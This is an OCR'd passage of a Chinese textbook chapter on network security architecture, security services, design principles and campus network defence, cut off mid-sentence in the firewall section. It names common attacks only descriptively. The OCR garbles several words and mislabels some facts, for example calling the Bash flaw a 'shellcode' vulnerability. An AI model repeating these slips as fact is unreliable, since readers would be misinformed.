近年 来 ， 由 于 国内 国外 的 各 类 安全 事件 频繁 发 生 ， 上 到 国家 、 社 会 ， 下 到 公司 、 个 
人 也 都 开始 注重 网 络 安全 。 从 2013 年 6 月 斯 诺 登 在 香港 将 美国 国家 安全 关于 棱镜 计划 监 
听 项 目的 秘密 文档 披露 给 了 英国 《 卫 保 》 和 美国 《华盛顿 邮 报 》 之 后 ， 网 络 安全 才 真正 
地 被 全 国 ， 全 球 关注 。 在 同年 的 5 月 ,“ 匿 名 组 织 ” 沙 特 分 部 分 支 发 起 了 “沙特 行动 ”， 
拿 下 了 沙特 外 交 部 、 财 政 部 和 情报 总 局 ,在 12 月 份 ， 中 国 央行 和 微 博 账号 遭 到 了 DDoS 
攻击 。 在 2014 年 ， 网 络 安全 事件 的 波及 面 也 是 越 来 越 大 ， 也 是 越 来 越 严 重 。 例 如 ， 中 国 
国内 通用 顶级 域名 服务 器 出 现 大 规模 的 DNS 解析 故障 ， 致 使 国内 的 很 多 网 站 都 出 现 了 
长 时 间 无 法 访问 的 情况 ，OpenSSL 心脏 出 血 漏洞 ， 该 漏洞 是 近年 来 影响 范围 最 大 的 高 危 
漏洞 ， 涉 及 各 大 银行 、 门 户 网 站 等 ，shellcode 漏洞 ， 此 漏洞 的 破坏 力 相 比 心脏 出 血 漏 洞 
更 大 , 黑客 利用 该 漏洞 可 以 破坏 数据 、 关 闭 网 络 或 者 是 对 网 络 发 起 攻击 ,2014 年 的 年 底 ， 
乌云 漏洞 平台 报告 称 黑客 通过 撞 库 的 方式 ,利用 12306 安全 机 制 的 漏洞 获取 了 13 万 多 条 
的 数据 。 在 2015 EE, 虽然 国家 、 企 业 对 网 络 安 全 予以 高 度 关注 , 但 是 安全 事件 还 是 层 
出 不 穷 。 国 内 的 有 xcodeghost 事件 和 网 易 用 户 数 据 库 “ 疑 似 泄漏 数量 近 5 亿 条 ”事件 。 
国外 则 出 现 了 Hacking team 泄漏 事件 。 除 了 这 些 安全 事件 之 外 ， 也 出 现 了 许多 重大 的 漏 
洞 ， 如 Java 反 序列 化 漏洞 、redis 未 授权 访问 漏洞 、Joomla 的 sql 注入 漏洞 ， 通 过 此 漏洞 
可 以 获得 后 台数 据 管理 员 权限 ， 进 而 获取 网 站 敏感 信息 。 虽 然 国 家 从 整体 层面 上 对 网 络 
安全 十 分 地 重视 ， 同 时 也 在 加 强 这 方面 的 建设 ， 但 是 网 络 安全 事件 还 是 不 计 其 数 ， 各 种 
网 络 安全 的 漏洞 也 是 很 多 。 总 体 来 说 ， 目 前 社会 乃至 全 球 ， 网 络 安全 都 是 予以 高 度 的 重 
视 ， 国 家 也 在 投入 更 多 的 资源 来 建设 网 络 安全 ， 但 到 目前 为 止 ， 网 络 安全 的 事态 依旧 是 
很 严峻 的 。 

除了 以 上 所 说 的 常见 的 安全 事件 和 漏洞 ， 还 有 一 种 特殊 的 网 络 安全 威胁 一 一 APT。 
APT 的 全 称 为 advanced persistent threat， 翻 译 为 中 文 就 是 高 级 长 期 威胁 ， 是 指 隐匿 而 持 
久 的 电脑 入 侵 过 程 ， 通 常 由 某 些 人 员 精 心 策划 ， 针 对 特定 目标 。 其 通常 是 出 于 商业 或 政 
治 动机 ， 针 对 特定 组 织 或 国家 ， 并 要 求 在 长 时 间 内 保持 高 隐蔽 性 。 与 APT 攻击 的 专业 性 
和 复杂 性 相对 应 ,企业 对 其 的 防范 困难 。 尤其 是 利用 了 Oday 漏洞 或 者 是 社会 工程 学 的 手 
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段 来 进行 的 APT 攻击 ， 更 是 难以 防御 。 在 网 络 安全 日 益 被 重视 的 今天 ，APT 攻击 已 经 
是 国家 网 络 安全 对 抗 的 重要 目标 。 


6.1.2 ”网络 安全 需求 分 析 


建立 安全 体系 结构 的 目的 就 是 在 管理 和 技术 上 保证 安全 策略 得 以 完整 准确 地 实现 ， 
安全 需求 全 面 准确 地 得 以 满足 ， 包 括 确定 必须 的 安全 服务 、 安 全 机 制 和 技术 管理 以 及 它 
们 在 系统 上 的 合理 部 署 和 关系 配置 。 

国际 标准 化 组 织 GSO)1989 年 制定 了 国际 标准 《信息 处 理 系统 开发 系统 互联 基本 
参考 模型 第 2 部 分 : 安全 体系 结构 》 提出 了 ISO/OSI 开放 系统 互联 参考 模型 的 安全 体 
系 结构 。 这 是 一 个 普遍 适用 的 安全 体系 结构 ， 对 具体 的 网 络 环境 的 安全 体系 结构 具有 指 
导 意 义 。 图 6-1 显示 的 就 是 开放 系统 互 连 安全 体系 结构 的 示意 图 。 
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图 6-1 开放 系统 互 连 安全 提携 结构 示意 图 


在 ISO 安全 体系 结构 中 包含 了 安全 服务 (Security Service)、 安 全 机 制 (Security 
Mechanism) 和 安全 管理 (Security Management)， 并 且 明 确 了 OSI 网 络 层次 、 安 全 服务 和 
安全 机 制 之 间 的 逻辑 关系 。 在 此 参考 模型 中 定义 了 五 大 类 安全 服务 ， 提 供 相关 服务 的 八 
大 类 安全 机 制 以 及 相应 的 开发 系统 互联 的 安全 管理 ， 并 且 可 根据 具体 的 系统 适当 配置 于 
OSI 模型 的 七 层 协议 中 。 

而 在 网 络 安全 体系 结构 中 的 设计 上 借鉴 了 ISO 的 安全 体系 结构 中 的 主要 思想 。 如 果 
将 网 络 安全 看 成 一 个 由 多 个 安全 单元 组 成 的 集合 。 其 中 每 一 个 安全 单元 都 是 一 个 整体 ， 
包含 了 许多 特性 。 网 络 安全 体系 结构 则 是 由 三 个 安全 单元 组 成 的 ， 分 别 是 安全 服务 ， 协 
议 层次 和 系统 单元 。 网 络 安全 体系 结构 的 示意 如 图 6-2 所 示 。 
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图 6-2 网 络 安全 体系 结构 示意 图 


图 中 描述 的 就 是 一 个 三 维 的 网 络 安全 空间 ， 它 反映 了 网 络 安 全 需求 和 体系 结构 的 共 
性 。 图 中 的 三 维特 性 分 别 是 安全 服务 ， 系 统 单元 和 协议 层次 。 其 中 在 每 一 个 特性 上 面 都 
为 它们 提供 了 安全 管理 。 安 全 管理 就 是 连接 这 三 个 纬度 ， 保 证 整个 体系 结构 的 安全 性 。 

网 络 安 全 体系 结构 主要 包括 三 部 分 内 容 ， 安 全 服务 、 协 议 层次 、 系 统 单元 。 针 对 网 
络 安 全 存在 的 各 种 类 型 的 安全 威胁 ， 将 会 针对 这 些 威胁 定义 一 组 安全 服务 。 为 支持 这 些 
服务 ， 在 系统 中 定义 了 一 些 安全 机 制 ， 同 时 安全 管理 由 于 不 是 正常 的 通信 业务 ， 主 要 是 
为 用 户 的 通信 通告 安全 支持 和 控制 。 

安全 服务 指 的 是 该 安全 单元 能 解决 什么 安全 威胁 。 一 般 来 说 ， 网 络 安 全 的 威胁 主要 
是 在 来 自 于 人 的 恶意 行为 可 能 造成 的 资源 被 破坏 、 信 息 泄漏 等 等 。 安 全 服务 主要 包括 了 
以 下 六 个 方面 : 认证 、 访 问 控制 、 数 据 完整 性 、 数 据 保密 性 、 抗 抵赖 、 审 计 和 可 用 性 。 

@ 认证 服务 。 认 证 服务 提供 某 个 实体 的 身份 保护 ， 在 通信 的 某 一 个 特定 过 程 中 ， 
如 果 某 个 实体 声称 具有 特定 的 身份 时 ， 认 证 服务 就 提供 一 种 方法 来 证 实 这 个 声称 是 否 
正确 。 

由 于 在 某 种 程度 上 ， 网 络 安全 体系 结构 的 其 他 安全 服务 都 依赖 于 认证 服务 ， 或 者 和 
认证 服务 紧密 地 结合 ， 因 此 认证 服务 是 一 个 重要 的 基础 安全 服务 。 通 过 认证 服务 在 很 多 
情况 下 就 可 以 杜绝 像 CSRF (Cross-site request forgery， 跨 站 请 求 伪 造 ) 这 样 的 攻击 。 同 
时 在 保障 系统 的 物理 安全 时 ， 也 会 起 到 一 定 的 作用 。 

@ 访问 控制 服务 。 访 问 控制 服务 经 常 和 认证 服务 一 起 使 用 。 访 问 控制 服务 就 是 对 
某 些 确认 身份 的 实体 ， 限 制 其 对 某 些 资源 的 访问 。 访 问 控制 服务 可 以 防止 未 授权 的 实体 
访问 资源 ， 所 谓 未 授权 的 访问 就 是 未 经 授权 的 使 用 、 修 改 、 销 毁 数 据 资源 以 及 执行 指令 
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代码 等 。 访问 控制 服务 直接 支持 保密 性 、 完 整 性 、 可 用 性 和 认证 安全 性 ， 其 中 对 保密 性 、 
完整 和 认证 所 起 到 的 作用 十 分 明显 。 访 问 控制 是 实现 授权 的 一 种 方法 。 它 涉及 到 通信 和 
系统 的 安全 问题 。 由 于 必须 在 网 络 上 传输 访问 控制 信息 ， 所 以 它 对 通信 协议 具有 很 高 的 
安全 要 求 。 

@ 数据 完整 性 服务 主要 提供 了 可 恢复 的 连接 完整 性 、 不 可 恢复 的 连接 完整 性 ， 选 
择 字段 的 连接 完整 性 、 无 连接 完整 性 、 选 择 字段 无 连接 完整 性 等 安全 服务 。 数 据 完整 性 
服务 直接 保证 数据 的 完整 性 。 所 有 的 数据 完整 性 服务 都 能 够 对 付 新 增 或 修改 数据 的 企图 。 

@ 数据 保密 服务 ， 数 据 保密 性 服务 保护 信息 不 泄露 或 不 暴露 给 那些 未 授权 想 掌握 
该 信息 的 实体 。 这 种 服务 有 以 下 几 个 方面 : 连接 保密 性 、 无 连接 保密 性 、 选 择 字段 保密 
性 、 业 务 流程 保密 性 。 

© 抗 抵赖 性 ， 抗 否认 服务 与 其 他 安全 服务 有 根本 的 不 同 。 它 主要 保护 通信 系统 不 
会 遭 到 系统 中 其 他 合法 用 户 的 威胁 ， 而 不 是 来 自 位 置 攻击 者 的 威胁 。 抗 抵赖 服务 的 触发 
点 不 仅仅 由 于 在 通信 各 方 之 间 存 在 着 相互 欺骗 的 可 能 性 ， 另 外 它 也 反映 了 一 个 现实 ， 即 
没有 任何 一 个 系统 是 完全 完备 的 ， 而 且 也 可 能 出 现 通信 双方 最 终 达 不 成 一 致 协议 这 样 的 
情况 。 抗 抵赖 服务 可 采取 以 下 两 种 形式 ， 数据 起 源 的 抗 抵赖 和 传递 过 程 的 抗 抵赖 。 

@ 审计 服务 主要 是 对 系统 的 数据 和 业务 流程 进行 安全 审计 ， 找 出 其 中 可 能 存在 的 
漏洞 或 者 是 薄弱 环节 。 同 时 也 收集 可 用 于 安全 审计 的 数据 ， 以 便 对 系统 的 记录 和 活动 进 
行 独立 地 观察 和 检查 。 

© 可 用 性 服务 ， 这 是 整个 网 络 安全 体系 结构 所 提供 的 最 基本 的 服务 。 网 络 安全 首 
先 要 保证 系统 的 可 用 性 然后 在 此 基础 上 保证 系统 的 安全 性 。 

系统 单元 指 的 是 该 安全 单元 解决 什么 系统 环境 的 安全 问题 。 对 于 现代 的 互联 网 ， 系 
统 单元 可 以 分 为 五 个 不 同 环境 : 物理 环境 、 应 用 平台 、 系 统 平台 、 网 络 平台 、 通 信 平 台 。 

物理 环境 ， 如 硬件 设备 、 网 络 设备 等 ， 包 含 该 特性 的 安全 单元 解决 物理 环境 的 安全 
问题 。 例 如 使 用 交换 机 代替 集线器 可 以 缓解 网 络 窃听 问题 。 

应 用 平台 主要 指 的 是 各 种 不 同 的 应 用 程序 和 中 间 件 。 应 用 程序 是 在 操作 系统 上 安装 
和 运行 的 。 包 含 该 特性 的 安全 单元 解决 应 用 程序 所 包含 的 安全 问题 。 一 般 是 指数 据 在 操 
作 和 资源 在 使 用 的 时 候 的 安全 威胁 。 

系统 平台 则 指 的 是 操作 系统 。 包 含 该 特性 的 安全 单元 解决 端 系统 或 者 中 间 系 统 (网 
桥 、 路 由 器 等 ) 的 操作 系统 包含 的 安全 问题 。 一 般 是 指数 据 和 资源 在 存储 时 的 安全 威胁 。 

网 络 平台 则 指 的 是 网 络 传输 。 包 含 该 特性 的 安全 单元 解决 网 络 协议 所 造成 的 安全 问 
题 。 一 般 是 指数 据 在 网 络 上 传输 的 安全 威胁 。 例 如 加 密 技 术 可 以 解决 数据 在 网 络 传输 时 
的 安全 问题 。 

通信 平台 则 主要 指 的 是 通信 线路 。 包 含 该 线路 的 安全 单元 主要 解决 的 是 通信 线路 所 
存在 的 安全 问题 。 包 括 系 统 软 硬件 设计 、 配 置 及 使 用 不 当 ， 物 理 电 磁 辐 射 引 起 的 信息 泄 
漏 等 方面 的 问题 。 
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协议 层次 是 互联 网 的 TCP/IP 协议 的 基础 。 安 全 单元 的 这 个 特性 描述 了 该 安全 单元 
在 网 络 互联 协议 中 ， 解 决 了 什么 样 的 互联 问题 。 

物理 层 设 计 在 物理 通信 道上 传输 原始 比特 ， 处 理 与 物理 传输 介质 有 关机 制 的 、 电 器 
过 程 的 接口 。 在 物理 层 上 传输 的 单元 是 信号 。 

链 路 层 。 链 路 层 分 为 介质 访问 控制 和 逻辑 链 路 控制 两 个 子 层 。 在 链 路 层 上 传输 的 单 
元 是 比特 。 
网 络 层 。 网 络 层 负责 将 数据 从 物理 连接 的 一 端 传递 到 另 一 端 , 即 所 谓 的 点 到 点 通信 。 
它 的 主要 功能 是 寻找 路 径 ， 以 及 与 之 相关 的 流量 控制 和 拥塞 控制 等 。 在 网 络 层 上 传输 的 
单元 是 网 络 数据 包 。 

传输 层 。 传 输 层 的 主要 目的 在 于 弥补 网 络 服务 与 用 户 需 求 之 间 的 差距 。 传 输 层 通 过 
向 上 提供 一 个 标准 、 通 用 的 界面 ， 使 上 层 与 通信 子 网 (下 三 层 ) 的 细节 相隔 离 。 传 输 层 的 
主要 任务 是 提供 进程 间 通 信 机 制 和 保证 数据 传输 的 可 靠 性 。 

应 用 层 。 应 用 层 向 用 户 提供 最 常用 且 通 用 的 应 用 程序 ， 包 括 电 子 邮件 、 文 件 传输 、 
网 页 浏览 等 。 应 用 层 描述 了 端 对 端 之 间 的 通信 。 

以 上 就 是 在 网 络 安全 体系 结构 中 不 同 的 三 个 特性 的 介绍 和 说 明 。 除 了 这 三 个 特性 之 
外 ， 安 全 管理 是 这 三 个 特性 的 “ 粘 合 剂 ” 保证 了 这 三 个 特性 之 间 有 效 的 结合 。 安 全 管理 
的 主要 作用 是 实施 一 系列 的 安全 政策 ， 对 系统 和 网 络 上 的 操作 进行 管理 。 安 全 管理 包含 
三 个 部 分 : 系统 安全 管理 、 安 全 服务 管理 、 安 全 机 制 的 管理 。 

系统 安全 管理 主要 是 涉及 到 整体 的 网 络 安全 环境 的 管理 ， 例 如 安全 事件 的 管理 ， 包 
括 时 间 报告 、 存 储 和 查询 等 ， 安 全 服务 管理 则 涉及 特定 安全 服务 的 管理 ， 其 中 包括 指定 
安全 服务 可 使 用 的 安全 机 制 、 对 可 使 用 的 安全 机 制 进行 协商 ;安全 机 制 管理 ， 安 全 机 制 
管理 涉及 的 是 特定 安全 机 制 的 管理 ， 包 括 密 钥 管理 、 加 密 管 理 、 数 字 签 名 管理 、 访 问 控 
制 管理 、 路 由 控制 管理 等 。 


6.1.3 ”网络 安全 设计 原则 


从 网 络 安全 角度 看 ， 网 络 安全 防护 系统 的 设计 与 实现 应 按照 以 下 原则 : 最 小 权限 原 
则 、 纵 深 防御 原则 、 防 御 多 样 性 原则 、 防 御 整体 性 原则 、 安 全 性 与 代价 平衡 原则 、 网 络 
资源 的 等 级 性 原则 。 

最 小 权限 原则 : 任何 对 象 应 该 只 有 具有 该 对 象 需要 完成 其 指定 任务 的 权限 ， 限 定 权 
限 使 用 的 范围 、 空 间 、 时 间 等 ， 减 少 资源 的 攻击 面 ， 从 而 减少 因 侵袭 所 造成 的 损失 。 

纵深 防御 原则 : 要 求 网 络 安全 防护 系统 是 一 个 多 层 安 全 系统 , 避免 成 为 网 络 中 的 “ 单 
失效 点 ”, 要 部 署 有 多 重 的 防御 系统 , 这 样 就 可 以 在 其 中 的 一 个 系统 被 攻破 之 后 后 续 还 有 
其 他 的 防御 系统 来 保障 系统 的 安全 。 

防御 多 样 性 原则 存在 技术 和 防御 方式 两 个 方面 。 在 技术 方面 ， 要 保障 主机 安全 ， 网 
络 安全 ， 同 时 要 注意 防范 病毒 和 木马 。 而 在 防御 方式 上 面 则 可 以 部 署 防火 墙 、 IDS、 蜜 
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饶 等 等 手段 保护 系统 安全 。 防 御 多 样 性 是 要 求 在 系统 中 的 不 同 组 件 中 都 需要 不 是 一 定 的 
安全 产品 ， 同 时 还 要 结合 多 种 不 同 的 安全 产品 来 共同 保证 系统 的 安全 。 安 全 防御 性 原则 
的 实施 就 避免 了 系统 的 仅仅 使 用 单一 的 安全 措施 和 服务 ， 以 此 来 保障 系统 的 安全 性 。 

网 络 安全 的 整体 性 原则 : 要 求 在 网 络 发 生 被 攻击 、 破 坏事 件 的 情况 下 ， 必 须 尽 可 能 
地 快速 恢复 网 络 信息 中 心 的 服务 ， 减 少 损失 ;同时 在 网 络 系统 各 个 点 上 部 署 安全 防御 措 
施 ， 避 免 出 现 安全 的 木 桶 效应 。 因 此 信息 安全 系统 应 该 包括 安全 防护 机 制 、 安 全 检测 机 
制 和 安全 响应 机 制 。 安 全 防护 机 制 是 根据 具体 系统 存在 的 各 种 安全 威胁 采取 的 相应 的 防 
护 措施 ， 避 免 非法 攻击 的 进行 。 安 全 检测 机 制 是 检测 系统 的 运行 情况 ， 及 时 发 现 和 制止 
对 系统 进行 的 各 种 攻击 。 安 全 响应 机 制 是 在 安全 防护 机 制 失效 的 情况 下 , 进行 应 急 处 理 。 

安全 性 评价 与 平衡 原则 :对 任何 网 络 ， 绝 对 安全 难以 达到 ， 也 不 一 定 是 必要 的 ， 所 
以 需要 建立 合理 的 实用 安全 性 与 用 户 需求 评价 与 平衡 体系 。 安 全 体系 设计 要 正确 处 理 需 
求 、 风 险 与 代价 的 关系 ， 做 到 安全 性 与 可 用 性 相 容 ， 做 到 组 织 上 可 执行 。 评 价 信息 是 否 
安全 , 没有 绝对 的 评判 标准 和 衡量 指标 , 只 能 取决 于 系统 的 用 户 需求 和 具体 的 应 用 环境 ， 
具体 取决 于 系统 的 规模 和 范围 ， 系 统 的 性 质 和 信息 的 重要 程度 。 

标准 化 与 一 致 性 原则 :安全 体系 是 一 个 复杂 的 系统 工程 ， 涉 及 人 、 技 术 、 操 作 等 要 
素 。 单 靠 技术 或 单 靠 管理 都 不 可 能 实现 。 因 此 ， 必 须 将 各 种 安全 技术 与 运行 管理 机 制 、 
人 员 思 想 教育 与 技术 培训 、 安 全 规章 制度 建设 相 结合 。 

网 络 资源 的 等 级 性 原则 ; 等 级 性 原则 是 指 要 根据 不 同 的 情况 设置 不 同 的 安全 层次 和 
安全 级 别 。 良 好 的 信息 安全 系统 必然 是 分 为 不 同等 级 的 ， 包 括 对 信息 保密 程度 分 级 ， 对 
用 户 操作 权限 分 级 ， 对 网 络 安全 程度 分 级 〈 安 全 子 网 和 安全 区 域 )， 对 系统 实现 结构 的 分 
级 〈 应 用 层 、 网 络 层 、 链 路 层 等 )， 从 而 针对 不 同 级 别 的 安全 对 象 ， 提 供 全 面 、 可 选 的 安 
全 算法 和 安全 体制 ， 以 满足 网 络 中 不 同 层次 的 各 种 实际 的 需求 。 

另外 , 还 有 阻塞 点 原则 , 即 理想 的 网 络 安全 防护 系统 应 该 是 互联 网 中 的 安全 控制 点 ， 
在 此 把 它 叫 做 “阻塞 点 ”， 它 简化 了 网 络 的 安全 管理 ， 便 于 对 网 络 通 信 进 行 监控 和 审计 。 

由 于 政策 规定 、 服 务 需求 的 不 明确 ， 环 境 、 条 件 、 时 间 的 变化 ， 攻 击 手 段 的 进步 ， 
安全 防护 不 可 能 一 步 到 位 ， 可 在 一 个 比较 全 面 的 安全 规划 下 ， 根 据 网 络 的 实际 需要 ， 先 
建立 基本 的 安全 体系 ， 保 证 基本 的 、 必 须 的 安全 性 。 随 着 今后 网 络 规模 的 扩大 及 应 用 的 
增加 ， 网 络 应 用 和 复杂 程度 的 变化 ， 网 络 脆弱 性 也 会 不 断 增 加 ， 调 整 或 增强 安全 防护 力 
度 以 保证 整个 网 络 最 根本 的 安全 需求 。 


6.1.4 网 络 安全 基本 设计 

随 着 Intemet 在 全 球 的 日 趋 普及 ， 计 算 机 网 络 已 经 深入 军事 、 教 育 、 政 府 、 商 业 等 
各 行 各 业 ， 成 为 社会 重要 的 基础 设施 。 如 果 计 算 机 网 络 的 正常 运行 受到 威胁 ， 将 会 影响 
人 们 的 学 习 、 工 作 和 生活 。 

高 等 教育 和 科研 机 构 是 互联 网 诞生 的 摇篮 ， 也 是 各 种 网 络 技术 最 早 的 应 用 环境 。 全 
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国 各 国 的 高 等 教育 都 是 最 早 建设 和 利用 互联 网 技术 的 行业 之 一 。 高 校 校 园 网 最 先 应 用 最 
先进 的 网 络 技术 ， 网 络 应 用 普及 率 也 很 高 ， 同 时 用 户 群 密度 比较 活跃 ， 然 后 校园 网 由 于 
自身 的 特点 也 是 安全 问题 比较 突出 的 地 方 。 

校园 网 络 安全 是 指 校园 网 信息 系统 和 信息 资源 不 受 自然 和 人 为 有 害 因素 的 威胁 和 
危害 。 广 义 的 校园 网 网 络 包括 实体 安全 、 运 行 安全 、 数 据 安全 、 软 件 安全 和 通信 安全 等 。 
其 中 实体 安全 主要 是 指 校园 网 硬件 设备 和 通信 线路 的 安全 ， 其 威胁 来 自 自 然 和 人 为 危害 
等 因素 。 信 息 安全 包括 数据 安全 和 软件 安全 ， 其 威胁 主要 来 自信 息 破坏 和 信息 泄漏 。 狭 
义 的 校园 网 网 络 安全 是 指 校园 网 网 络 的 信息 安全 以 及 凡是 涉及 到 网 络 上 信息 的 保密 性 、 
完整 性 、 可 用 性 、 真 实 性 、 可 控 性 的 相关 技术 和 理论 。 


1. 对 网 络 硬件 设备 的 破坏 

这 种 威胁 是 目前 校园 网 中 比较 常见 的 安全 威胁 ， 主 要 表现 为 对 校园 网 络 线路 的 破 
坏 ， 例 如 施工 不 慎 挖 断 线 路 、 室 内 装修 剪 短 线路 、 网 络 交换 设备 的 损坏 。 

2. 窃取 和 干扰 网 络 传输 媒介 上 承载 的 信号 

这 种 威胁 主要 是 以 窍 听 和 王 扰 正常 通信 为 目的 的 ， 主 要 表现 方式 有 : 校园 网 内 一 些 
恶意 用 户 在 局 域 网 内 介入 非法 终端 或 在 传输 线路 上 非法 安装 接收 /转发 设备 , 对 网 络 传输 
媒介 上 的 电磁 信号 进行 屏蔽 、 人 窃听 和 分 析 ， 对 其 传播 进行 人 为 干扰 。 

3. 对 邮件 服务 器 进行 攻击 

恶意 用 户 利用 校园 网 内 邮件 服务 器 系统 的 缺陷 攻击 邮件 服务 器 ， 而 常见 的 邮件 服务 
器 缺乏 有 效 的 邮件 过 滤 机 制 和 邮件 转发 限制 机 制 。 对 邮件 服务 器 进行 的 攻击 的 常见 方式 
有 : 一 类 是 中 继 攻击 ， 即 远程 攻击 邮件 服务 器 向 外 发 送 邮件 。 另 一 类 攻击 是 垃圾 邮件 ， 
通过 大 量 发 送 垃圾 邮件 ， 造 成 邮件 服务 器 阻塞 ， 增 大 校园 网 流量 ， 甚 至 系统 崩溃 。 

4. 针对 应 用 服务 器 的 攻击 

校园 网 中 较 易 受到 攻击 的 应 用 服务 器 是 DNS 服务 器 、Web 应 用 服务 器 。 对 DNS 服 
务 器 的 攻击 有 缓存 区 中 毒 、 域 劫持 、 域 传送 等 。 对 Web 服务 器 的 攻击 更 是 十 分 多 样 。 最 
常见 的 就 是 口令 入 侵 ， 由 于 校园 网 的 管理 人 员 来 说 缺乏 一 定 的 安全 意识 和 相关 的 安全 知 
WA, 在 很 多 情况 下 会 使 用 软件 中 默认 的 用 户 名 和 密码 , 这 样 就 为 口令 入 侵 提供 了 可 能 性 ; 
Web 服务 器 存在 SQL 注入 和 文件 上 传 漏洞 导致 服务 器 上 信息 泄露 和 主机 被 控 。 

5. 管理 者 和 使 用 者 的 威胁 

严格 的 管理 是 校园 网 安全 的 重要 措施 。 实 际 上 ， 很 多 学 校 都 属于 这 方面 的 管理 ， 对 
网 络 的 管理 朴 忽 大 意 ， 对 网 络 安全 的 保护 不 够 重视 ， 这 些 都 是 校园 网 安全 所 需要 面临 的 
问题 。 除 了 管理 者 之 外 ， 还 有 学 生 的 因素 。 由 于 校园 网 主要 是 防御 外 部 的 攻击 ， 在 校园 
网 的 内 部 主要 是 为 学 生 们 提供 服务 的 ， 在 内 部 的 防护 则 较为 的 薄弱 。 但 是 对 于 具有 较 高 
的 黑客 能 力 的 学 生 ， 他 们 可 能 更 加 方便 地 入 侵 到 校园 网 的 管理 内 网 中 ， 如 果 这 些 学 生 在 
校园 网 的 内 网 中 安装 了 木马 或 者 是 配置 了 后 门 程序 ， 那 么 对 于 校园 网 的 管理 者 来 说 ， 也 
是 很 难 发 现 的 。 
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以 上 都 是 目前 高 校 校 园 网 中 普遍 存在 的 弊病 。 但 是 对 于 一 个 具体 的 高 校 的 校园 网 ， 
它 所 面临 的 实际 的 安全 威胁 还 要 具体 的 分 析 。 相 应 地 ， 校 园 网 安全 系统 的 设计 和 实现 也 
会 有 所 不 同 。 下 面 以 某 校园 网 为 例 来 具体 说 明 校 园 网 安全 系统 的 设计 问题 。 

该 校园 网 络 安全 系统 的 建设 必须 立足 于 全 校 系 统 整体 网 络 安全 。 安 全 设计 方案 要 求 
立足 于 学 校对 校园 网 络 平台 建设 的 统一 要 求 ， 从 学 校 整 体 网 络 安全 需求 考虑 ， 制 定 一 套 
网 络 安全 的 整体 设计 方案 ， 包 括 基 本 安全 如 网 络 防火 墙 、 防 病毒 等 ， 需 要 制定 有 关 的 网 
络 安全 的 管理 制度 ， 安 全 策略 等 。 该 网 络 系统 应 建成 一 个 以 宽带 技术 为 基础 、 提 供 多 层 
次 服务 、 支 持 多 媒体 应 用 的 信息 服务 网 络 。 从 结构 上 看 ,其 网 络 结构 应 该 包括 三 个 层次 : 
核心 层 、 汇 聚 层 、 接 入 层 。 接 入 层 : 主要 功能 是 为 最 终 用 户 听 过 网 络 接 入 。 汇 聚 层 ， 是 
网 络 接 入 层 和 核心 层 之 间 的 分 界 点 。 核心 层 : 核心 层 的 主要 目的 是 尽 可 能 快 地 交换 数据 。 
主要 是 用 来 提供 交换 区 块 间 的 连接 、 提 供 到 其 他 区 块 的 访问 。 总 体 来 说 ， 需 要 建设 一 个 
高 速 、 高 效 的 网 控 中 心 ， 提 供 多 种 网 络 功能 服务 和 安全 服务 ， 主 要 负责 业务 信息 数据 服 
务 器 网 络 、 业 务 网 的 完善 与 安全 运行 管理 、 网 控 中 心 设备 的 运行 维护 ; 赋值 内 部 局 域 网 、 
办 公 楼 局 域 网 的 运行 管理 和 维护 ， 负 责 对 外 提供 网 络 介入 相关 业务 等 。 

图 6-3 是 一 个 典型 的 校园 网 的 网 络 体系 结构 示意 图 。 从 图 中 可 以 看 出 ， 校 园 网 的 网 
络 体 系 结构 包括 校园 网 的 网 络 边 界 设备 ， 核 心 及 骨干 设备 ， 网 络 介 入 层 设备 ， 网 络 服务 
提供 设备 和 这 些 设备 的 连接 方式 以 及 该 结构 采用 的 协议 和 技术 。 该 校园 网 络 一 般 有 边界 
路 由 器 ， 高 性 能 的 核心 路 由 机 ， 各 分 布 的 三 层 路 由 交换 机 ， 大 量 的 二 层 可 网 管 接 入 交换 
机 以 及 接 入 认证 系统 、 防 火 墙 、IDS、 内 容 过 滤 系 统 、 流 量 分 析 系 统 、 网 络 设备 管理 系 
统 等 网 络 硬件 设备 。 


汇聚 交换 机 / 


防火 墙 


my ER 


图 6-3 校园 网 典型 网 络 拓 扑 图 
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根据 上 面 网 络 体系 结构 的 设计 思想 和 校园 网 络 所 遇 到 的 网 络 安全 威胁 ， 校 园 网 络 需 
要 组 合 必要 的 安全 设备 和 安全 服务 来 构建 网 络 安全 系统 ， 提 供 路 由 安全 、 路 由 过 滤 、 防 
火 墙 、IDS、VPN、 电 子 邮 件 安全 、Web 安全 等 。 

1. 路 由 安全 

具有 一 个 安全 路 由 体系 结构 的 网 络 与 一 个 路 由 结构 设计 拙劣 的 网 络 相 比 ， 前 者 更 不 
容易 受 攻击 ， 不 易 出 现 纶 漏 。 设 计 适 当 的 路 由 基础 结构 还 能 够 帮助 网 络 在 遭受 攻击 期 间 
降低 故障 时 间 。 

2. 路 由 过 滤 

适当 的 路 由 过 滤 对 于 任何 实现 良好 的 网 络 都 是 重要 的 。 在 校园 网 中 ， 确 保 路 由 过 滤 
用 于 过 滤 那 些 进 入 校园 网 的 假 的 和 不 受 欢 迎 的 路 由 ， 并 且 确 保 只 有 真正 包含 在 内 部 网 络 
上 的 路 由 才能 允许 通过 。 路 由 过 滤 也 用 于 隐藏 某 一 块 网 络 。 同 时 ， 通 过 配备 适当 的 防火 
墙 和 其 他 认证 机 制 ， 路 由 过 滤 也 能 够 阻挡 从 安全 性 较 低 的 网 络 区 到 安全 性 高 的 网 络 区 的 
访问 。 常 见 的 路 由 设置 方案 有 静态 路 由 和 路 由 认证 。 但 是 这 两 者 的 使 用 均 有 一 定 的 局 限 
性 。 所 以 很 多 时 候 ， 不 能 使 用 单一 的 路 由 方法 来 用 作 路 由 过 滤 ， 要 结合 多 种 路 由 设置 方 
法 。 同 时 还 不 能 将 路 由 过 滤 作 为 网 络 安全 的 单一 手段 。 

3. 防火 墙 设置 

设置 防火 墙 并 正确 配置 防火 墙 都 很 重要 。 在 校园 网 中 ， 防 火 墙 的 设置 应 该 需要 满足 
以 下 原则 。 

(1) 防火 墙 应 该 尽 可 能 设置 在 网 络 最 终 出 口 和 入 口 的 校园 网 边界 。 这 样 专用 网 络 中 
最 大 数量 的 设备 能 够 受到 防火 墙 的 保护 ， 同 时 也 有 助 于 校园 网 和 公用 网 络 保持 分 明 的 
界限 。 

(2) 除了 将 防火 墙 设置 在 网 络 入 口 点 之 外 ， 某 些 情况 可 能 也 需要 将 防火 墙 设置 在 校 
园 网 内 部 。 比 如 校园 网 中 的 财务 处 服务 器 、 图 书馆 网 段 或 教务 处 服务 器 所 在 的 网 段 都 需 
